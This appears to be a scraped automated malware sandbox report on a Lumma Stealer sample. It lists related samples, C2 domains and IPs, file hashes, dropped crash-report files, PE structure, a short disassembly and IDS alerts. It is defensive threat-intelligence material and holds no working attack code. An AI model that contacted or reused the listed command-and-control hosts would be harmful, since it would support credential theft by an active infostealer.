• www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106 | OGBLsboKIF.exe | Get hash | malicious | LummaC | Browse
| NfwBtCx5PR.exe | Get hash | malicious | LummaC | Browse
| pJRiqnTih0.exe | Get hash | malicious | LummaC | Browse
| 5XXofntDiN.exe | Get hash | malicious | LummaC | Browse
| xxLuwS60RS.exe | Get hash | malicious | LummaC | Browse
| 5RjjCWZAVv.exe | Get hash | malicious | LummaC | Browse
| s31ydU1MpQ.exe | Get hash | malicious | LummaC, Stealc | Browse
| TmmiCE5Ulm.exe | Get hash | malicious | LummaC | Browse
| 9pyUjy2elE.exe | Get hash | malicious | LummaC | Browse
| 0gnHF2twcT.exe | Get hash | malicious | LummaC | Browse

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
lev-tolstoi.com | NfwBtCx5PR.exe | Get hash | malicious | LummaC | Browse
• 172.67.157.254
| pJRiqnTih0.exe | Get hash | malicious | LummaC | Browse
• 172.67.157.254
| xxLuwS60RS.exe | Get hash | malicious | LummaC | Browse
• 172.67.157.254
| 5RjjCWZAVv.exe | Get hash | malicious | LummaC | Browse
• 104.21.66.86
| s31ydU1MpQ.exe | Get hash | malicious | LummaC, Stealc | Browse
• 104.21.66.86
| TmmiCE5Ulm.exe | Get hash | malicious | LummaC | Browse
• 104.21.66.86
| 9pyUjy2elE.exe | Get hash | malicious | LummaC | Browse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      steamcommunity.comOGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      AKAMAI-ASN1EUOGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      CLOUDFLARENETUSFjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.32.96
                                                                                                                                                                                                                                                      0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.36.201
                                                                                                                                                                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.199.72
                                                                                                                                                                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.36.201
                                                                                                                                                                                                                                                      NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.199.72
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9702008826300067
Encrypted: false
SSDEEP: 96:wZUoztTXTuQsYhry72f1QXIDcQ4c6VZcEbcw31+HbHg/wWGTf3hOyc45WAU6NCUc:UUoZuQ00m/h2jsFmmzuiFeZ24IO8L
MD5: 8D78755BFC3CFBCF5045B8D66B006B2D
SHA1: 87212E49188FE00D9BE995540B571C6B67226211
SHA-256: 42BE52EE0A3325F1F784889080FCFB51C8168EF8B8E4976AE822796AFA3116B2
SHA-512: 56EDAB7ED11461EBF731FF6B3DFEBC532B816AA79E34BF06D4E218EF3546AF0A308F7D3C099F4496771BC5BA7F323D7CF209ECC125F3FFEBF3CA75EB287C0BDD
Malicious: true
Reputation: low
Preview (UTF-16LE decoded, truncated at the end as in the report):
Version=1
EventType=APPCRASH
EventTime=133794131038568641
ReportType=2
Consent=1
UploadTime=133794131051693627
ReportStatus=655456
ReportIdentifier=e276ca95-539e-4bf3-8949-ea2cfe6476cd
IntegratorReportIdentifier=cd6b08ba-1bd5-4477-9283-68cc798f3396
Wow64Host=34404
Wow64Guest=332
NsAppName=HK8IIasL9i.exe
AppSessionGuid=00001a40-0001-0014-5cd9-779f0d55db01
TargetAppId=W:0006985f58f407a31e00cbfb505f0e23a1e70000ffff!00003b305cb3e20e48cb0b0532185e49136511838987!HK8IIasL9i.exe
TargetApp
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:38:24 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51164
                                                                                                                                                                                                                                                      Entropy (8bit):2.7221120260250515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:69QXftNlkWKFSOp1B73Stb+PmW0/t7S4jJ3tLg0Yih4Ei+IOoiDr3fr5doFk3y:bN1KFt7B73gbnd9sih7lpPvr9C
                                                                                                                                                                                                                                                      MD5:06394B4E404A8FC0A6B3D4EAA67AEBC1
                                                                                                                                                                                                                                                      SHA1:375252123C498BB8794FACC233046CD5188F9BE6
                                                                                                                                                                                                                                                      SHA-256:E77C63D48B3C16EC3E98C9C78D0C63E00C5EEF406E9E6ADE450B3C04782B6549
                                                                                                                                                                                                                                                      SHA-512:82E0BDBBB0176F4D7BBEF809139C4C1DE90174BB43CF5097F670892BF76A5F906FBA4604064A7AE911936126442BD46AE9EAB446315D6EB4DBAF08BA549D81CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:MDMP..a..... .......p.ig............4...............H...................................`.......8...........T............B.......................... ..............................................................................eJ......d!......GenuineIntel............T.......@...e.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8312
                                                                                                                                                                                                                                                      Entropy (8bit):3.6992103565461036
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJvsb6v6YEImSUOo3gmfsspDg89b+ssfwocqm:R6lXJg6v6YEJSUOo3gmfs8+/fwog
                                                                                                                                                                                                                                                      MD5:25178D4F97700533A38E8450D7E0E628
                                                                                                                                                                                                                                                      SHA1:F4B476B0133E4ED3BE1A502794FCD8A6782CFF42
                                                                                                                                                                                                                                                      SHA-256:BA72DDA581C870D48489BD82B82371EB96A16BEDE9EC6E6CF76B7D69AA9E53BA
                                                                                                                                                                                                                                                      SHA-512:F4D7F2A1C59216303A66AE06FAC9A9AD1280346AC61732374F7E1F3F460CE7201296B61033D3776EEA4201359F2123BA00F02F67DE02E9B94482811FDC2C2866
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.0.<./.P.i.
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4579
                                                                                                                                                                                                                                                      Entropy (8bit):4.474945028529214
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsnyJg77aI92xWpW8VYAYm8M4JtKXiFFlo+q8fOpYcHX9zDpd:uIjfnAI7og7VcJfeY2tzDpd
                                                                                                                                                                                                                                                      MD5:FC606AD62C5EFAE7E3F92900F788478C
                                                                                                                                                                                                                                                      SHA1:D76D5DF4554AB0911CC1441D5EC4DA4AB0680654
                                                                                                                                                                                                                                                      SHA-256:845D1E07BCA4BD8F2852175E9B86AF59E53C24BA0B0077A4E4B860A3C455A709
                                                                                                                                                                                                                                                      SHA-512:5D57A25019A5161173F910E97C88DFC145BC55C601188419DD5D1F75B9CF547A94E9661EAA333DE4279F26F4754362202E735812DF4A1668C20AC968C9D6B241
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643601" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.421551975200269
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:jSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNF0uhiTw:uvloTMW+EZMM6DFyX03w
                                                                                                                                                                                                                                                      MD5:BF2FC4E2096259600612FF708BF9C7B1
                                                                                                                                                                                                                                                      SHA1:663CB4AF1A0B0DAAAC65EB25EC2114BE4AC1EBF8
                                                                                                                                                                                                                                                      SHA-256:E806BFEBDF1668420B4F9749B2A8613C52E4951D4AE4AF65C93CBCEB5FCA8FC1
                                                                                                                                                                                                                                                      SHA-512:452E98371D602DCAB6600979F862992FD5E91E5629C097B4E097DE9D75FBB1329B55A447A5D81AA1DFC6B3E3D6CE4842A618B3F7F984CD1EBB9368C4584456B1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV.s..U...............................................................................................................................................................................................................................................................................................................................................Nd.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.377624112978058
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:HK8IIasL9i.exe
                                                                                                                                                                                                                                                      File size:295'424 bytes
                                                                                                                                                                                                                                                      MD5:7dc18a69dcdca002579bfde5d5427ff2
                                                                                                                                                                                                                                                      SHA1:3b305cb3e20e48cb0b0532185e49136511838987
                                                                                                                                                                                                                                                      SHA256:dbcd285bed7578f894354dd630c4be5cf9ffdf4d4e96b861937235466bc8fc29
                                                                                                                                                                                                                                                      SHA512:e0df240c7b3ccbd682b9b290eb03a5770a0ef2b8ab40d487119fb34456213ac890f441b307579e31d4207d68092061edab9b0adda9f9309dfc2fbd238768eb8d
                                                                                                                                                                                                                                                      SSDEEP:6144:+rF/ysYSR3gurbAjNlCitV5fVFbSCHp97JfS2hEru:+FKVSFbr8lCiD5NFbBRf9R
                                                                                                                                                                                                                                                      TLSH:CD54F12236E0C471D44741328975C771BA6FB4326A75898B33E413BEFF309A25A7E35A
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-,..-,..-,...,..-,...,..-,...,S.-,.)V,..-,..,,..-,...,..-,...,..-,...,..-,Rich..-,........................PE..L....N.f...
                                                                                                                                                                                                                                                      Icon Hash:63796de961476e0f
                                                                                                                                                                                                                                                      Entrypoint:0x404bae
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp: 0x66044ECA [Wed Mar 27 16:52:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: dd6758145b1623dda9a99720fa5b9de8
Instruction
call 00007FFA6D22DFC4h
jmp 00007FFA6D22911Dh
int3
int3
int3
int3
int3
int3
int3
int3
call 00007FFA6D2292DCh
xchg cl, ch
jmp 00007FFA6D2292C4h
call 00007FFA6D2292D3h
fxch st(0), st(1)
jmp 00007FFA6D2292BBh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FFA6D2292B1h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FFA6D2292A6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FFA6D2292A4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FFA6D2292A7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FFA6D22E18Fh
fstp st(0)
fld tbyte ptr [00440D2Ah]
ret
fstp st(0)
or cl, cl
je 00007FFA6D2292ADh
fstp st(0)
fldpi
or ch, ch
je 00007FFA6D2292A4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FFA6D229299h
fchs
ret
fstp st(0)
jmp 00007FFA6D22E165h
fstp st(0)
mov cl, ch
jmp 00007FFA6D2292A2h
call 00007FFA6D22926Eh
jmp 00007FFA6D22E170h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, 00000030h
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ea00 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0x39d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2e60 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x18c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e308 | 0x3e400 | 6e363f3bc9100a20c1425fa31fd3706a | False | 0.8716624309738956 | data | 7.797011755872956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0xabfc | 0x6000 | d28a6abad1195a1eeae2070c43447a33 | False | 0.08203125 | data | 0.9737254719140257 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4b000 | 0xa9d8 | 0x3a00 | ad84ff2cd0147f243263468ce4d5480f | False | 0.4463227370689655 | data | 3.9297880019610165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4b1e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5368663594470046
RT_ICON | 0x4b1e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5368663594470046
RT_ICON | 0x4b8a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4101659751037344
RT_ICON | 0x4b8a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4101659751037344
RT_ICON | 0x4de50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.450354609929078
RT_ICON | 0x4de50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.450354609929078
RT_STRING | 0x4e540 | 0x496 | data | Tamil | India | 0.444633730834753
RT_STRING | 0x4e540 | 0x496 | data | Tamil | Sri Lanka | 0.444633730834753
RT_ACCELERATOR | 0x4e2e8 | 0x50 | data | Tamil | India | 0.825
RT_ACCELERATOR | 0x4e2e8 | 0x50 | data | Tamil | Sri Lanka | 0.825
RT_GROUP_ICON | 0x4e2b8 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x4e2b8 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_VERSION | 0x4e338 | 0x208 | data | - | - | 0.5365384615384615
DLL | Import
KERNEL32.dll | WriteConsoleInputW, SetComputerNameExA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, SetFileAttributesA, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, OpenEventA, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, SetCalendarInfoA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapReAlloc, ReadFile, RtlUnwind, RaiseException, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T08:38:15.793341+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.5 | 49854 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:16.020160+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.5 | 62727 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:16.241365+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.5 | 59334 | 1.1.1.1 | 53 | UDP
